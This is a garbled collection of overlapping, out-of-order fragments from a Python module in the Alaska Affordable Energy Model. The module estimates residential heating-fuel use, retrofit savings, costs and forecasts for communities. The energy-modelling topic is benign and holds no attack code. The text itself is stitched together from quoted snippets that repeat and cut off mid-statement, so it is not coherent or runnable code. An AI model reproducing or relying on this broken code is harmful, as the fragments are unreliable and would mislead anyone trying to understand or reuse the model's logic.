constants.mmbtu_to_gal_HF) amnt =", "line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating", "Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential:", "(self): \"\"\"Get total fuel saved. Returns ------- float the total fuel saved in", "heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating fuels", "= self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ----------", "Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost", "that have not been retrofit as of 2010, the performance improvements as a", "\\ self.proposed_fuel_Hoil_consumption * HF_price + \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption *", "\\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH =", "----- Accepted scalers: capital costs. \"\"\" self.was_run = True self.reason = \"OK\" tag", "+ \\ self.proposed_fuel_wood_consumption * wood_price + \\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption", "in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data']", "directory : path output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]:", "\"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost", "consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per yer", "self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu = self.savings_HF", "return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced.", "All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\", \"Residential:", "self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~", "self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG =", "(MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(),", "initial value: diag or new diagnostics object forecast : forecast community forecast for", "calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption", "consumption Parameters ---------- fuel_amnt: float % of fuel used total_consumption : float total", "consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas", "constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\", "savings opportunities Attributes ---------- opportunity_HH : int Houses that can be retrofit savings_HF", "HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base", "Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating", "float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"]", "Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year)", "config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska", "LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan", "self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community',", "- \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the forecast to", "np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel", ": float initial natural gas fuel consumption init_LP : float initial propane consumption", "None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData CommunityData Object", "amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total,", "baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent = rd[\"Fuel Oil\"]", "(self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel from the total consumption", "electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric", "scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler", "Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All", "community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr =", ": float initial heating oil consumption init_wood : float initial heating cordwood consumption", "retrofit savings_HF : float savings in heating oil consumption savings_wood : float savings", "(kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat", "Oil\"] / 100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg", "proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel cost \"\"\"", "100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"])", "Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption Savings\", \"Residential: Heating Natural Gas", "Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\":", "for first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied']", "component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years, self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\",", "EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI", "amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted", "def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float the total fuel", "proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption", "ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs", "= np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year)", "baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel", "self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption *", "self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential", "100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt", "s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas", "Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post", "np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption :", "failure if run == False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run", "= self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) +", "self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption", "Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost,", "Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post", "self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for", "total consumption for residential buildings HH : float a # of houses cf:", "Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year)", "for tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component data", "---------- capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH", "= self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if", "as np from pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings from", "pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil", "Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption", "r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost", "home is also calculated. Parameters ---------- community_data : CommunityData CommunityData Object for a", "self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model", "be retrofit savings_HF : float savings in heating oil consumption savings_wood : float", "int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel", "as constants from config import COMPONENT_NAME, UNKNOWN class ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component", "not been retrofit as of 2010, the performance improvements as a percentage of", "proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption", "was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self):", "\\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\", "Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year)", "Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate", "Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost,", "= b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio", "Natural Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential:", "# of households for the first year of the project Attributes ---------- init_HH", "\\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption *", "in the component runs to completion, False otherwise reason : string lists reason", "total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0", "return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline", "Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year)", "(cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass", "Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating", "Model: This module estimates the potential improvements to heating efficiency of residential buildings", "Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential: Heating", "self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\",", "retrofit was negative, setting to 0\" ) ## % as decimal #~ self.percent_savings", "savings_gas : float savings in natural gas fuel consumption savings_LP : float savings", ": diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary of components,", "Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con <", "buildings (homes). Consumption and savings are based on the number of units that", "Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post", "self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt =", "if run == False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run =", "houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per", "in directory Parameters ---------- directory : path output directory \"\"\" if not self.was_run:", "Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\",", "* elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP", "# 500 average energy use, 12 months in a year. That's where the", "Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating", "0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for", "(kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential:", "\"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost", "diagnostics for tracking error/warning messages prerequisites : dictionary of components, optional prerequisite component", "Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential:", "the Alaska Affordable Energy Model: This module estimates the potential improvements to heating", "gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self):", "wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\", "components, optional prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics == None:", "100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt", "#~ houses = int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh", "the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set", "# coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0", "str(round(percent_accounted)) + \\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def", "diagnostics object forecast : forecast community forecast for estimating future values initial value:", "np.float64(peps_per_house)) households.columns = [\"HH\"] self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied']", "the one in each of these function calls is an identity amnt =", "self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption - self.savings_mmbtu", "= df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption", "Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost", "EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total", "Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\",", "df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating", "pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData", "== 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\", "values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\", years,", "= np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project", "amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\", "\"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate", "Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil", "\"Residential: Heating Oil (gallons/year) Consumption Savings\", \"Residential: Heating Biomass (cords/year) Consumption Baseline\", \"Residential:", "= np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil =", "b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost", "Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential:", "avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) /", "calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity", "+= amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0", "to 0\" ) ## % as decimal #~ self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings", "data for a community. Initial value: 'Residential Buildings' section of community_data See also", "Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are the difference in the", "in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"]", "self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh", "proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set to", "Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential:", "\\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households =", "+ \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs", "= int(self.comp_specs['data']['Total Occupied']) #~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house'])", "EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\", "= \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption =", "\"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating Oil (gallons/year) Consumption", "per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con", "Returns ------- float: fuel consumed for a type of fuel \"\"\" HH_consumption =", "\"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\",", "self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted +=", "float the total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\", "years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year)", "heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self):", "self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total Occupied']) #~", "house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). >=", "per house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency',", "(cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential:", "proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price", "costs. \"\"\" self.was_run = True self.reason = \"OK\" tag = self.cd['file id'].split('+') if", "\\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\", "\"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model: This module estimates", "gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan elec_price", ": float savings in propane consumption savings_kWh : float savings in electric consumption", "if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average", "numpy as np from pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings", "Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric", "Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\": r_oil, \"Residential: Heating", "difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def", "Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas", "aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants from config", "diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd =", "if (avg_con < con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other", "= b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption *", "average energy use, 12 months in a year. That's where the 6000.0 #", "of the pre-retrofit consumption, and the forecasted price of offset heating fuels. The", "Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year,", ": Forecast forecast for a community diagnostics : diagnostics, optional diagnostics for tracking", "self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in", "savings_wood : float savings in heating cordwood consumption savings_gas : float savings in", "\"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential':", "= \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption", "mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit", "+ self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price", "Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post", "np.array electric savings ($/year) are the difference in the base and proposed fuel", "Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential:", "* area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption", "(SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total", "- self.savings_wood self.proposed_fuel_LP_consumption = \\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption -", "HF_price = (self.diesel_prices + self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price =", "aaem.community_data import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants", "[mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords)", "= self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption", "= np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "(gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost ,", "r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas", "np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas", "are the difference in the base and proposed fuel costs \"\"\" self.annual_electric_savings =", "Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel All", "self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood", "heating oil consumption savings_wood : float savings in heating cordwood consumption savings_gas :", "* self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project", "self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0)", "Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential:", "Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate", ": np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption", "fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of heating fuels per", "scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\", "'residential': self.was_run = False self.reason = \"Not a residential project.\" return # needed", "HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI", "scaler = (HH - self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ 